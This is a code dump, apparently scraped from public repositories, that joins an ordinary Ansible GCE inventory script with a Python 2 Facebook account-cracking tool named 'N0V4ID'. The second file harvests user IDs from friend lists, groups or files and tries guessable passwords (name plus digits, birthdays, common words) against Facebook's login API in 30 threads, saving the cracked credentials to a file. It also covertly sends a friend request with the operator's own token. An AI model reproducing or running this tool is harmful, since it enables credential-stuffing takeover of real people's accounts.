if max_age is None:
max_age = self.cache_max_age
if os.path.isfile(self.cache_path_cache):
mod_time = os.path.getmtime(self.cache_path_cache)
current_time = time()
if (mod_time + max_age) > current_time:
return True
return False
def get_all_data_from_cache(self, filename=''):
''' Reads the JSON inventory from the cache file. Returns Python dictionary. '''
data = ''
if not filename:
filename = self.cache_path_cache
with open(filename, 'r') as cache:
data = cache.read()
return json.loads(data)
def write_to_cache(self, data, filename=''):
''' Writes data to file as JSON. Returns True. '''
if not filename:
filename = self.cache_path_cache
json_data = json.dumps(data)
with open(filename, 'w') as cache:
cache.write(json_data)
return True
class GceInventory(object):
def __init__(self):
# Cache object
self.cache = None
# dictionary containing inventory read from disk
self.inventory = {}
# Read settings and parse CLI arguments
self.parse_cli_args()
self.config = self.get_config()
self.drivers = self.get_gce_drivers()
self.ip_type = self.get_inventory_options()
if self.ip_type:
self.ip_type = self.ip_type.lower()
# Cache management
start_inventory_time = time()
cache_used = False
if self.args.refresh_cache or not self.cache.is_valid():
self.do_api_calls_update_cache()
else:
self.load_inventory_from_cache()
cache_used = True
self.inventory['_meta']['stats'] = {'use_cache': True}
self.inventory['_meta']['stats'] = {
'inventory_load_time': time() - start_inventory_time,
'cache_used': cache_used
}
# Just display data for specific host
if self.args.host:
print(self.json_format_dict(
self.inventory['_meta']['hostvars'][self.args.host],
pretty=self.args.pretty))
else:
# Otherwise, assume user wants all instances grouped
zones = self.parse_env_zones()
print(self.json_format_dict(self.inventory,
pretty=self.args.pretty))
sys.exit(0)
def get_config(self):
"""
Reads the settings from the gce.ini file.
Populates a ConfigParser object with defaults and
attempts to read an .ini-style configuration from the filename
specified in GCE_INI_PATH. If the environment variable is
not present, the filename defaults to gce.ini in the current
working directory.
"""
gce_ini_default_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)), "gce.ini")
gce_ini_path = os.environ.get('GCE_INI_PATH', gce_ini_default_path)
# Create a ConfigParser.
# This provides empty defaults to each key, so that environment
# variable configuration (as opposed to INI configuration) is able
# to work.
config = configparser.ConfigParser(defaults={
'gce_service_account_email_address': '',
'gce_service_account_pem_file_path': '',
'gce_project_id': '',
'gce_zone': '',
'libcloud_secrets': '',
'instance_tags': '',
'inventory_ip_type': '',
'cache_path': '~/.ansible/tmp',
'cache_max_age': '300'
})
if 'gce' not in config.sections():
config.add_section('gce')
if 'inventory' not in config.sections():
config.add_section('inventory')
if 'cache' not in config.sections():
config.add_section('cache')
config.read(gce_ini_path)
#########
# Section added for processing ini settings
#########
# Set the instance_states filter based on config file options
self.instance_states = []
if config.has_option('gce', 'instance_states'):
states = config.get('gce', 'instance_states')
# Ignore if instance_states is an empty string.
if states:
self.instance_states = states.split(',')
# Set the instance_tags filter, env var overrides config from file
# and cli param overrides all
if self.args.instance_tags:
self.instance_tags = self.args.instance_tags
else:
self.instance_tags = os.environ.get(
'GCE_INSTANCE_TAGS', config.get('gce', 'instance_tags'))
if self.instance_tags:
self.instance_tags = self.instance_tags.split(',')
# Caching
cache_path = config.get('cache', 'cache_path')
cache_max_age = config.getint('cache', 'cache_max_age')
# TOOD(supertom): support project-specific caches
cache_name = 'ansible-gce.cache'
self.cache = CloudInventoryCache(cache_path=cache_path,
cache_max_age=cache_max_age,
cache_name=cache_name)
return config
def get_inventory_options(self):
"""Determine inventory options. Environment variables always
take precedence over configuration files."""
ip_type = self.config.get('inventory', 'inventory_ip_type')
# If the appropriate environment variables are set, they override
# other configuration
ip_type = os.environ.get('INVENTORY_IP_TYPE', ip_type)
return ip_type
def get_gce_drivers(self):
"""Determine the GCE authorization settings and return a list of
libcloud drivers.
"""
# Attempt to get GCE params from a configuration file, if one
# exists.
secrets_path = self.config.get('gce', 'libcloud_secrets')
secrets_found = False
try:
import secrets
args = list(secrets.GCE_PARAMS)
kwargs = secrets.GCE_KEYWORD_PARAMS
secrets_found = True
except Exception:
pass
if not secrets_found and secrets_path:
if not secrets_path.endswith('secrets.py'):
err = "Must specify libcloud secrets file as "
err += "/absolute/path/to/secrets.py"
sys.exit(err)
sys.path.append(os.path.dirname(secrets_path))
try:
import secrets
args = list(getattr(secrets, 'GCE_PARAMS', []))
kwargs = getattr(secrets, 'GCE_KEYWORD_PARAMS', {})
secrets_found = True
except Exception:
pass
if not secrets_found:
args = [
self.config.get('gce', 'gce_service_account_email_address'),
self.config.get('gce', 'gce_service_account_pem_file_path')
]
kwargs = {'project': self.config.get('gce', 'gce_project_id'),
'datacenter': self.config.get('gce', 'gce_zone')}
# If the appropriate environment variables are set, they override
# other configuration; process those into our args and kwargs.
args[0] = os.environ.get('GCE_EMAIL', args[0])
args[1] = os.environ.get('GCE_PEM_FILE_PATH', args[1])
args[1] = os.environ.get('GCE_CREDENTIALS_FILE_PATH', args[1])
kwargs['project'] = os.environ.get('GCE_PROJECT', kwargs['project'])
kwargs['datacenter'] = os.environ.get('GCE_ZONE', kwargs['datacenter'])
gce_drivers = []
projects = kwargs['project'].split(',')
for project in projects:
kwargs['project'] = project
gce = get_driver(Provider.GCE)(*args, **kwargs)
gce.connection.user_agent_append(
'%s/%s' % (USER_AGENT_PRODUCT, USER_AGENT_VERSION),
)
gce_drivers.append(gce)
return gce_drivers
def parse_env_zones(self):
'''returns a list of comma separated zones parsed from the GCE_ZONE environment variable.
If provided, this will be used to filter the results of the grouped_instances call'''
import csv
reader = csv.reader([os.environ.get('GCE_ZONE', "")], skipinitialspace=True)
zones = [r for r in reader]
return [z for z in zones[0]]
def parse_cli_args(self):
''' Command line argument processing '''
parser = argparse.ArgumentParser(
description='Produce an Ansible Inventory file based on GCE')
parser.add_argument('--list', action='store_true', default=True,
help='List instances (default: True)')
parser.add_argument('--host', action='store',
help='Get all information about an instance')
parser.add_argument('--instance-tags', action='store',
help='Only include instances with this tags, separated by comma')
parser.add_argument('--pretty', action='store_true', default=False,
help='Pretty format (default: False)')
parser.add_argument(
'--refresh-cache', action='store_true', default=False,
help='Force refresh of cache by making API requests (default: False - use cache files)')
self.args = parser.parse_args()
def node_to_dict(self, inst):
md = {}
if inst is None:
return {}
if 'items' in inst.extra['metadata']:
for entry in inst.extra['metadata']['items']:
md[entry['key']] = entry['value']
net = inst.extra['networkInterfaces'][0]['network'].split('/')[-1]
subnet = None
if 'subnetwork' in inst.extra['networkInterfaces'][0]:
subnet = inst.extra['networkInterfaces'][0]['subnetwork'].split('/')[-1]
# default to exernal IP unless user has specified they prefer internal
if self.ip_type == 'internal':
ssh_host = inst.private_ips[0]
else:
ssh_host = inst.public_ips[0] if len(inst.public_ips) >= 1 else inst.private_ips[0]
return {
'gce_uuid': inst.uuid,
'gce_id': inst.id,
'gce_image': inst.image,
'gce_machine_type': inst.size,
'gce_private_ip': inst.private_ips[0],
'gce_public_ip': inst.public_ips[0] if len(inst.public_ips) >= 1 else None,
'gce_name': inst.name,
'gce_description': inst.extra['description'],
'gce_status': inst.extra['status'],
'gce_zone': inst.extra['zone'].name,
'gce_tags': inst.extra['tags'],
'gce_metadata': md,
'gce_network': net,
'gce_subnetwork': subnet,
# Hosts don't have a public name, so we add an IP
'ansible_ssh_host': ssh_host
}
def load_inventory_from_cache(self):
''' Loads inventory from JSON on disk. '''
try:
self.inventory = self.cache.get_all_data_from_cache()
hosts = self.inventory['_meta']['hostvars']
except Exception as e:
print(
"Invalid inventory file %s. Please rebuild with -refresh-cache option."
% (self.cache.cache_path_cache))
raise
def do_api_calls_update_cache(self):
''' Do API calls and save data in cache. '''
zones = self.parse_env_zones()
data = self.group_instances(zones)
self.cache.write_to_cache(data)
self.inventory = data
def list_nodes(self):
all_nodes = []
params, more_results = {'maxResults': 500}, True
while more_results:
for driver in self.drivers:
driver.connection.gce_params = params
all_nodes.extend(driver.list_nodes())
more_results = 'pageToken' in params
return all_nodes
def group_instances(self, zones=None):
'''Group all instances'''
groups = {}
meta = {}
meta["hostvars"] = {}
for node in self.list_nodes():
# This check filters on the desired instance states defined in the
# config file with the instance_states config option.
#
# If the instance_states list is _empty_ then _ALL_ states are returned.
#
# If the instance_states list is _populated_ then check the current
# state against the instance_states list
if self.instance_states and not node.extra['status'] in self.instance_states:
continue
# This check filters on the desired instance tags defined in the
# config file with the instance_tags config option, env var GCE_INSTANCE_TAGS,
# or as the cli param --instance-tags.
#
# If the instance_tags list is _empty_ then _ALL_ instances are returned.
#
# If the instance_tags list is _populated_ then check the current
# instance tags against the instance_tags list. If the instance has
# at least one tag from the instance_tags list, it is returned.
if self.instance_tags and not set(self.instance_tags) & set(node.extra['tags']):
continue
name = node.name
meta["hostvars"][name] = self.node_to_dict(node)
zone = node.extra['zone'].name
# To avoid making multiple requests per zone
# we list all nodes and then filter the results
if zones and zone not in zones:
continue
if zone in groups:
groups[zone].append(name)
else:
groups[zone] = [name]
tags = node.extra['tags']
for t in tags:
if t.startswith('group-'):
tag = t[6:]
else:
tag = 'tag_%s' % t
if tag in groups:
groups[tag].append(name)
else:
groups[tag] = [name]
net = node.extra['networkInterfaces'][0]['network'].split('/')[-1]
net = 'network_%s' % net
if net in groups:
groups[net].append(name)
else:
groups[net] = [name]
machine_type = node.size
if machine_type in groups:
groups[machine_type].append(name)
else:
groups[machine_type] = [name]
image = node.image or 'persistent_disk'
if image in groups:
groups[image].append(name)
else:
groups[image] = [name]
status = node.extra['status']
stat = 'status_%s' % status.lower()
if stat in groups:
groups[stat].append(name)
else:
groups[stat] = [name]
for private_ip in node.private_ips:
groups[private_ip] = [name]
if len(node.public_ips) >= 1:
for public_ip in node.public_ips:
groups[public_ip] = [name]
groups["_meta"] = meta
return groups
def json_format_dict(self, data, pretty=False):
''' Converts a dict to a JSON object and dumps it as a formatted
string '''
if pretty:
return json.dumps(data, sort_keys=True, indent=2)
else:
return json.dumps(data)
# Run the script
if __name__ == '__main__':
GceInventory() | [
"lucien.pereira@colabrain.fr"
] | lucien.pereira@colabrain.fr |
f9ce32e3176a0497a3eaef6daa9ac60efd04cfbb | babced6fab78db2ff90bcadcc4c1e177fc2dba2f | /N0V4ID | 5bfc2e5d33003de8ca2a539f737d7ef8e0543be9 | [] | no_license | N0V4ID/new | cfe2cefe286144e0ca958d795597dbbc61e7f6dc | 0acfddaf2184173550ccc36a5e45fd582cd8760a | refs/heads/master | 2022-11-15T08:31:09.028607 | 2020-07-16T06:15:55 | 2020-07-16T06:15:55 | 280,065,024 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 33,175 | #!/usr/bin/python2
# coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.05)
logo = """ \x1b[1;93m______ \x1b[1;92m_______ \x1b[1;94m______ \x1b[1;91m___ _\n \x1b[1;93m| | \x1b[1;92m| _ |\x1b[1;94m| _ | \x1b[1;91m| | | |\n \x1b[1;93m| _ |\x1b[1;92m| |_| |\x1b[1;94m| | || \x1b[1;91m| |_| |\n \x1b[1;93m| | | |\x1b[1;92m| |\x1b[1;94m| |_||_ \x1b[1;91m| _|\n \x1b[1;93m| |_| |\x1b[1;92m| |\x1b[1;94m| __ |\x1b[1;91m| |_ \n \x1b[1;93m| |\x1b[1;92m| _ |\x1b[1;94m| | | |\x1b[1;91m| _ |\n \x1b[1;93m|______| \x1b[1;92m|__| |__|\x1b[1;94m|___| |_|\x1b[1;91m|___| |_| \x1b[1;96mFB\n\n \x1b[1;95m●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●\n ✫╬─ \x1b[1;92mReCode \x1b[1;91m: \x1b[1;93 N0V4ID \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mFB \x1b[1;92m \x1b[1;91m: \x1b[1;96mFacebook.com/N0V4ID \x1b[1;95m─╬✫\n ✫╬─ \x1b[1;92mGitHub \x1b[1;91m: \x1b[1;94mGithub.com/H2CK8D \x1b[1;95m─╬✫\n ●▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬●
"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
def siapa():
os.system('clear')
nama = raw_input("\033[1;97mSiapa nama kamu ? \033[1;91m: \033[1;92m")
if nama =="":
print"\033[1;96m[!] \033[1;91mIsi yang benar"
time.sleep(1)
siapa()
else:
os.system('clear')
jalan("\033[1;97mSelamat datang \033[1;92m" +nama+ "\n\033[1;97mTerimakasih telah menggunakan tools ini !!")
time.sleep(1)
loginSC()
def loginSC():
os.system('clear')
print"\033[1;97mSilahkan login SC nya dulu bosque\n"
username = raw_input("\033[1;96m[*] \033[1;97mUsername \033[1;91m: \033[1;92m")
password = raw_input("\033[1;96m[*] \033[1;97mPassword \033[1;91m: \033[1;92m")
if username =="dark" and password =="fb":
print"\033[1;96m[✓] \033[1;92mLogin success"
time.sleep(1)
login()
else:
print"\033[1;96m[!] \033[1;91mSalah!!"
time.sleep(1)
LoginSC()
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FACEBOOK ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
os.system('xdg-open https://www.youtube.com/omaliptv')
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Hack facebook MBF"
print "\x1b[1;97m2.\x1b[1;93m Lihat daftar grup "
print "\x1b[1;97m3.\x1b[1;93m Informasi akun "
print "\x1b[1;97m4.\x1b[1;93m Yahoo clone "
print "\n\x1b[1;91m0.\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
informasi()
elif unikers =="4":
yahoo()
elif unikers =="0":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;97m1.\x1b[1;93m Crack dari daftar teman"
print "\x1b[1;97m2.\x1b[1;93m Crack dari teman"
print "\x1b[1;97m3.\x1b[1;93m Crack dari member grup"
print "\x1b[1;97m4.\x1b[1;93m Crack dari file"
print "\n\x1b[1;91m0.\x1b[1;91m Kembali"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+idg+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/'+idg+'/members?fields=name,id&limit=999999999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Bangsat'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
birthday = b['birthday']
pass5 = birthday.replace('/', '')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Sayang'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[✓] \x1b[1;92mBERHASIL'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;92m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;92m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[✖] \x1b[1;93mCEKPOINT'
print '\x1b[1;96m[✺] \x1b[1;97mNama \x1b[1;91m : \x1b[1;93m' + b['name']
print '\x1b[1;96m[➹] \x1b[1;97mID \x1b[1;91m : \x1b[1;93m' + user
print '\x1b[1;96m[➹] \x1b[1;97mPassword \x1b[1;91m: \x1b[1;93m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
except:
pass
p = ThreadPool(30)
p.map(main, id)
